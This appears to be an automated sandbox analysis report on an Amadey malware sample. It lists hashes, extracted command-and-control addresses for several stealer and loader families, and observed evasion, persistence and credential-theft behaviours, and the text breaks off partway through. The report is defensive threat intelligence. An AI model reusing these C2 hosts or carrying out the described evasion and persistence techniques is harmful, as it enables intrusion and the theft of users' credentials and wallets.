amadey | 3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62

Analysis

max time kernel
103s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
14-05-2024 19:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe
Size

1.7MB
MD5

b6270cf2d11dd69d4879c5c0b3947513
SHA1

85824c7c8fb745652e48494a508b55a70846f858
SHA256

3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62
SHA512

ec48550a2c947cbf936d4ca20dec61375b28f64a3a092edafe76c2090ea5bed5e92529289ba585260a291dc821959bf759e596b5a9c689dd6c0e384f19783f89
SSDEEP

49152:vkId1GPiSdRV5vhZO7GxvzjsjtCb9hzWSlZ:cIaKC3FhZO78zf9BWSr

Malware Config

Extracted

Family

amadey

Version

4.20

http://5.42.96.141

http://5.42.96.7

Attributes

install_dir
908f070dff
install_file
explorku.exe
strings_key
b25a9385246248a95c600f9a061438e1
url_paths
/go34ko8/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

redline

Botnet

185.215.113.67:26260

Extracted

Family

stealc

http://49.13.229.86

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

gcleaner

185.172.128.90

5.42.64.56

5.42.65.64

Extracted

Family

lumma

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

https://sofaprivateawarderysj.shop/api

https://lineagelasserytailsd.shop/api

https://headraisepresidensu.shop/api

https://minorittyeffeoos.shop/api

https://prideconstituiiosjk.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1156-108-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral1/files/0x0007000000023438-121.dat	family_zgrat_v1
behavioral1/memory/2388-134-0x0000000000420000-0x00000000004E0000-memory.dmp	family_zgrat_v1

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3288-542-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

Qq4Ok37f7DuRaKGoBsapXTNa.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Qq4Ok37f7DuRaKGoBsapXTNa.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0007000000023438-121.dat	family_redline
behavioral1/files/0x0007000000023437-127.dat	family_redline
behavioral1/memory/5700-130-0x0000000000520000-0x0000000000572000-memory.dmp	family_redline
behavioral1/memory/2388-134-0x0000000000420000-0x00000000004E0000-memory.dmp	family_redline
behavioral1/files/0x000900000002343b-185.dat	family_redline
behavioral1/memory/4472-199-0x0000000000C20000-0x0000000000C72000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

c5f9bf7662.exeaxplons.exeexplorku.exeQq4Ok37f7DuRaKGoBsapXTNa.exe3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exeexplorku.exeamers.exeaxplons.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c5f9bf7662.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Qq4Ok37f7DuRaKGoBsapXTNa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amers.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 41 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
3768	powershell.exe
5724	powershell.exe
5664	powershell.exe
2008	powershell.exe
6104	powershell.exe
3492	powershell.exe
4144	powershell.exe
5024	powershell.exe
2540	powershell.exe
6112	powershell.exe
5820	powershell.exe
892	powershell.exe
3612	powershell.exe
5032	powershell.exe
1320	powershell.exe
1424	powershell.exe
4792	powershell.exe
2296	powershell.exe
5824	powershell.exe
3812	powershell.exe
928	powershell.exe
4832	powershell.exe
2324	powershell.exe
5620	powershell.EXE
3608	powershell.EXE
3992	powershell.EXE
2732	powershell.exe
2744	powershell.exe
2488	powershell.exe
2396	powershell.exe
880	powershell.exe
2060	powershell.exe
764	powershell.exe
4988	powershell.exe
6040	powershell.exe
2452	powershell.exe
5460	powershell.exe
1456	powershell.exe
5276	powershell.exe
5232	powershell.exe
432	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

Processes:

H4BNchM4cj1N1IgIZEnDis9F.exe

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	H4BNchM4cj1N1IgIZEnDis9F.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exe

pid	Process
1320	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 17 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Qq4Ok37f7DuRaKGoBsapXTNa.exeexplorku.exeaxplons.exeexplorku.exeamers.exec5f9bf7662.exeInstall.exe3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exeaxplons.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Qq4Ok37f7DuRaKGoBsapXTNa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amers.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c5f9bf7662.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c5f9bf7662.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Qq4Ok37f7DuRaKGoBsapXTNa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amers.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

NewB.exeInstall.exe3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exeexplorku.exeamers.exeaxplons.exeRegAsm.exeinstall.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	NewB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	explorku.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	amers.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	axplons.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	install.exe

Executes dropped EXE 62 IoCs

Processes:

explorku.exeamers.exeaxplons.exec5f9bf7662.exealex.exekeks.exetrf.exegold.exeredline1.exeinstall.exeGameService.exeGameService.exeGameService.exeGameService.exeGameService.exeGameSyncLink.exe828948.exeswizzhis.exelumma1.exeGameService.exeNewB.exeGameService.exeGameService.exeGameService.exeGameService.exePiercingNetLink.exedl.exefile300un.exetoolspub1.exeGameService.exe4767d2e713f2021e8fe856e3ea638b58.exeFirstZ.exeGameService.exeGameService.exeGameService.exeGameSyncLinks.exe501115.exewp2E7KlkjN7XIvdMIzdwfiF6.exeZYBf0ogkuHSq2r9zBCegj8Ge.exepjGjQPhLGvu2xHuMA86i08A7.exey4jvp2Pqh1XudXwrcFu7KGFu.exeDDELkA2CYWL1k1yyRwEvNc2K.exeaxplons.exeexplorku.exe4767d2e713f2021e8fe856e3ea638b58.exeNewB.exeQq4Ok37f7DuRaKGoBsapXTNa.exeDDELkA2CYWL1k1yyRwEvNc2K.exeZYBf0ogkuHSq2r9zBCegj8Ge.exejMyhPtVcRAJsACUjhznK7pX6.exeInstall.exereakuqnanrkn.exepjGjQPhLGvu2xHuMA86i08A7.exeH4BNchM4cj1N1IgIZEnDis9F.exenWY7Ky3NpQuuuYVIUAh2TeN7.exereakuqnanrkn.execsrss.exeInstall.exereakuqnanrkn.exereakuqnanrkn.exeinjector.exereakuqnanrkn.exe

pid	Process
5184	explorku.exe
1524	amers.exe
2616	axplons.exe
3404	c5f9bf7662.exe
5832	alex.exe
5700	keks.exe
2388	trf.exe
1444	gold.exe
4472	redline1.exe
5596	install.exe
1288	GameService.exe
5048	GameService.exe
5608	GameService.exe
4976	GameService.exe
1784	GameService.exe
3692	GameSyncLink.exe
5604	828948.exe
2872	swizzhis.exe
4588	lumma1.exe
3948	GameService.exe
436	NewB.exe
3872	GameService.exe
2736	GameService.exe
4136	GameService.exe
4016	GameService.exe
3208	PiercingNetLink.exe
3660	dl.exe
5376	file300un.exe
2436	toolspub1.exe
1148	GameService.exe
3288	4767d2e713f2021e8fe856e3ea638b58.exe
2452	FirstZ.exe
432	GameService.exe
4668	GameService.exe
5268	GameService.exe
2260	GameSyncLinks.exe
4700	501115.exe
4660	wp2E7KlkjN7XIvdMIzdwfiF6.exe
3980	ZYBf0ogkuHSq2r9zBCegj8Ge.exe
5232	pjGjQPhLGvu2xHuMA86i08A7.exe
392	y4jvp2Pqh1XudXwrcFu7KGFu.exe
6004	DDELkA2CYWL1k1yyRwEvNc2K.exe
4108	axplons.exe
4332	explorku.exe
5944	4767d2e713f2021e8fe856e3ea638b58.exe
5128	NewB.exe
1856	Qq4Ok37f7DuRaKGoBsapXTNa.exe
1512	DDELkA2CYWL1k1yyRwEvNc2K.exe
5512	ZYBf0ogkuHSq2r9zBCegj8Ge.exe
1964	jMyhPtVcRAJsACUjhznK7pX6.exe
4612	Install.exe
4780	reakuqnanrkn.exe
3988	pjGjQPhLGvu2xHuMA86i08A7.exe
4956	H4BNchM4cj1N1IgIZEnDis9F.exe
3024	nWY7Ky3NpQuuuYVIUAh2TeN7.exe
3776	reakuqnanrkn.exe
6132	csrss.exe
2216	Install.exe
5676	reakuqnanrkn.exe
5024	reakuqnanrkn.exe
2972	injector.exe
1104	reakuqnanrkn.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

amers.exeaxplons.exeaxplons.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	amers.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine	axplons.exe

Loads dropped DLL 2 IoCs

Processes:

828948.exey4jvp2Pqh1XudXwrcFu7KGFu.exe

pid	Process
5604	828948.exe
392	y4jvp2Pqh1XudXwrcFu7KGFu.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 42 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/5844-1-0x0000000000030000-0x0000000000583000-memory.dmp	themida
behavioral1/memory/5844-3-0x0000000000030000-0x0000000000583000-memory.dmp	themida
behavioral1/memory/5844-2-0x0000000000030000-0x0000000000583000-memory.dmp	themida
behavioral1/memory/5844-0-0x0000000000030000-0x0000000000583000-memory.dmp	themida
behavioral1/memory/5844-7-0x0000000000030000-0x0000000000583000-memory.dmp	themida
behavioral1/memory/5844-6-0x0000000000030000-0x0000000000583000-memory.dmp	themida
behavioral1/memory/5844-4-0x0000000000030000-0x0000000000583000-memory.dmp	themida
behavioral1/memory/5844-5-0x0000000000030000-0x0000000000583000-memory.dmp	themida
behavioral1/memory/5844-8-0x0000000000030000-0x0000000000583000-memory.dmp	themida
behavioral1/files/0x000c0000000006c5-14.dat	themida
behavioral1/memory/5844-22-0x0000000000030000-0x0000000000583000-memory.dmp	themida
behavioral1/memory/5184-20-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/5184-25-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/5184-27-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/5184-29-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/5184-28-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/5184-26-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/5184-24-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/5184-23-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/5184-30-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/5184-31-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/files/0x00080000000233a7-70.dat	themida
behavioral1/memory/3404-83-0x0000000000110000-0x00000000007A0000-memory.dmp	themida
behavioral1/memory/3404-84-0x0000000000110000-0x00000000007A0000-memory.dmp	themida
behavioral1/memory/3404-86-0x0000000000110000-0x00000000007A0000-memory.dmp	themida
behavioral1/memory/3404-85-0x0000000000110000-0x00000000007A0000-memory.dmp	themida
behavioral1/memory/3404-87-0x0000000000110000-0x00000000007A0000-memory.dmp	themida
behavioral1/memory/3404-88-0x0000000000110000-0x00000000007A0000-memory.dmp	themida
behavioral1/memory/3404-90-0x0000000000110000-0x00000000007A0000-memory.dmp	themida
behavioral1/memory/3404-89-0x0000000000110000-0x00000000007A0000-memory.dmp	themida
behavioral1/memory/3404-91-0x0000000000110000-0x00000000007A0000-memory.dmp	themida
behavioral1/memory/5184-92-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/3404-314-0x0000000000110000-0x00000000007A0000-memory.dmp	themida
behavioral1/memory/4332-603-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/4332-604-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/4332-617-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/4332-609-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/4332-608-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/4332-607-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/4332-605-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/memory/4332-602-0x0000000000300000-0x0000000000853000-memory.dmp	themida
behavioral1/files/0x000c000000023495-677.dat	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorku.exepjGjQPhLGvu2xHuMA86i08A7.exe4767d2e713f2021e8fe856e3ea638b58.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c5f9bf7662.exe = "C:\\Users\\Admin\\1000006002\\c5f9bf7662.exe"	explorku.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	pjGjQPhLGvu2xHuMA86i08A7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	4767d2e713f2021e8fe856e3ea638b58.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exeexplorku.exec5f9bf7662.exeexplorku.exeQq4Ok37f7DuRaKGoBsapXTNa.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	c5f9bf7662.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Qq4Ok37f7DuRaKGoBsapXTNa.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

Processes:

flow	ioc
130	pastebin.com
310	pastebin.com
311	pastebin.com
128	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
211	api.myip.com
212	api.myip.com
214	ipinfo.io
215	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

Processes:

y4jvp2Pqh1XudXwrcFu7KGFu.exe

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	y4jvp2Pqh1XudXwrcFu7KGFu.exe

Drops file in System32 directory 24 IoCs

Processes:

reakuqnanrkn.exereakuqnanrkn.exeQq4Ok37f7DuRaKGoBsapXTNa.exepowershell.exepowershell.exepowershell.exereakuqnanrkn.exeFirstZ.exereakuqnanrkn.exepowershell.exeInstall.exepowershell.exepowershell.exeH4BNchM4cj1N1IgIZEnDis9F.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Qq4Ok37f7DuRaKGoBsapXTNa.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Qq4Ok37f7DuRaKGoBsapXTNa.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Qq4Ok37f7DuRaKGoBsapXTNa.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	H4BNchM4cj1N1IgIZEnDis9F.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Qq4Ok37f7DuRaKGoBsapXTNa.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

amers.exeaxplons.exeaxplons.exeQq4Ok37f7DuRaKGoBsapXTNa.exe

pid	Process
1524	amers.exe
2616	axplons.exe
4108	axplons.exe
1856	Qq4Ok37f7DuRaKGoBsapXTNa.exe
1856	Qq4Ok37f7DuRaKGoBsapXTNa.exe

Suspicious use of SetThreadContext 10 IoCs

Processes:

alex.exegold.exeswizzhis.exelumma1.exepowershell.exereakuqnanrkn.exereakuqnanrkn.exereakuqnanrkn.exereakuqnanrkn.exe

description	pid	Process	procid_target
PID 5832 set thread context of 1156	5832	alex.exe	103
PID 1444 set thread context of 740	1444	gold.exe	112
PID 2872 set thread context of 3052	2872	swizzhis.exe	130
PID 4588 set thread context of 5360	4588	lumma1.exe	137
PID 764 set thread context of 3172	764	powershell.exe	194
PID 4780 set thread context of 5280	4780	reakuqnanrkn.exe	305
PID 4780 set thread context of 4592	4780	reakuqnanrkn.exe	527
PID 3776 set thread context of 2344	3776	reakuqnanrkn.exe	535
PID 5676 set thread context of 5740	5676	reakuqnanrkn.exe	409
PID 5024 set thread context of 5668	5024	reakuqnanrkn.exe	480

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

Processes:

4767d2e713f2021e8fe856e3ea638b58.exepjGjQPhLGvu2xHuMA86i08A7.exe

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	4767d2e713f2021e8fe856e3ea638b58.exe
File opened (read-only)	\??\VBoxMiniRdrDN	pjGjQPhLGvu2xHuMA86i08A7.exe

Drops file in Program Files directory 14 IoCs

Processes:

install.exe

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe

Drops file in Windows directory 7 IoCs

Processes:

4767d2e713f2021e8fe856e3ea638b58.exeschtasks.exe3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exeamers.exepjGjQPhLGvu2xHuMA86i08A7.exe

description	ioc	Process
File opened for modification	C:\Windows\rss	4767d2e713f2021e8fe856e3ea638b58.exe
File created	C:\Windows\rss\csrss.exe	4767d2e713f2021e8fe856e3ea638b58.exe
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File created	C:\Windows\Tasks\explorku.job	3b03eb3e0d82d7f3773004e63315b4b739ccaf4a2d1f7ff67f96da3d49dcbe62.exe
File created	C:\Windows\Tasks\axplons.job	amers.exe
File opened for modification	C:\Windows\rss	pjGjQPhLGvu2xHuMA86i08A7.exe
File created	C:\Windows\rss\csrss.exe	pjGjQPhLGvu2xHuMA86i08A7.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

